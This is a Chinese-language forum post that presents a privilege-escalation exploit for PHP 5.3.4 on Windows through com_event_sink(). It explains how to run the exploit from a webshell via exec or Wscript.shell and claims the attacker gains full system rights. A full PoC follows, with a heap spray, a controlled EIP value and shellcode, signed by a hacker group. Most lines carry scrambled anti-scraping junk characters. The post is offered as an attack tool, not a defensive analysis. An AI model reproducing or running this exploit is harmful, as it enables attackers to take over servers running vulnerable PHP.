|
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
6 T8 s4 E3 N. e
: a7 ~0 C4 o* P测试方法如下:cmd /c x:\php\php.exe x:\test.php/ s9 d4 X( e: o! x
; w+ M) o) Y% q9 `! L/ D4 u- a
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php2 t$ R$ L: u4 k2 k5 _
这里是两个测试的截图:4 m& Z2 t8 s: N- l# o9 w" K( z
" g* M, @6 f) e
3 l% p0 J T. ?! W. ^( s) {3 R/ B( e+ o' R0 e# s: m4 G8 Q! j
+ a) e1 E, y, j' u7 `5 ~1 r9 x- f0 Y' A
成功利用此漏洞的攻击者将获得系统的最高权限1 }1 Y8 O% d9 E' B
5 D5 I' X5 k0 _8 B2 b& J3 o# {/ v% ~
8 ?/ V% p! h1 M" i
! m' D* H" L2 V5 t
' p0 W* ?" N5 S" o8 E* o( d- J ?+ C) U- }
关于漏洞分析稍后附上。一下是PoC代码:
4 V) Z2 l j9 L9 p" y u& y0 P2 i* @4 m4 {6 {' m( H
<?php2 n5 Z. r) O$ V
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞# C S6 P3 P& b0 W4 k- _
//$eip ="\x44\x43\x42\x41";
4 U7 u2 G( y; r1 i! Q1 ]$eip= "\x4b\xe8\x57\x78";
5 Z' |( c) \* p k) O$eax ="\x80\x01\x8d\x04";
5 Z$ \! o1 N1 K, t' o2 u4 q$ z4 t$deodrant="";5 R& g+ C+ N% L5 ^" e
$axespray = str_repeat($eip.$eax,0x80);3 h, n* x! e" e0 c# j
//048d0190
: _0 I' n4 v" }) U, v, p+ \echo strlen($axespray);
4 V% y( V" m x( t. D+ Eecho "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
! \& h; K: U- g3 i. X" k- h0 p5 }echo "Silic Group Hacker Army - BlackBap.Org";# g* v: g. y' Z$ h
//19200 ==4B32 4b00! L. N2 E2 y7 Q
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
0 p3 Y V8 ~2 u9 w$terminate = "T";
3 m8 U1 X4 P- ^% |1 _. G$u[] =$deodrant;
/ w u7 f- E) l o# Y$r[] =$deodrant.$terminate;
) s! d! X' \' J& W$a[] =$deodrant.$terminate;
; x! K n# R/ ?" v. i$s[] =$deodrant.$terminate;/ f D% h, \7 w& \. J$ y* T' r
//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的
: |. ]# I1 K; P/ H8 s( `$vVar = new VARIANT(0x048d0000+180);, x9 m7 a! C% I' v1 `7 W- t8 w+ P
//弹窗代码(Shellcode)* k: `+ e, O" ?. V
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";: w& B7 v- [; I2 \" s
$var2 = new VARIANT(0x41414242);
: L7 m# k" e( ~ {- Y! S8 ~) Pcom_event_sink($vVar,$var2,$buffer);
O1 O7 w3 l$ U/ K4 O?>
% c2 y1 t+ q% o |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|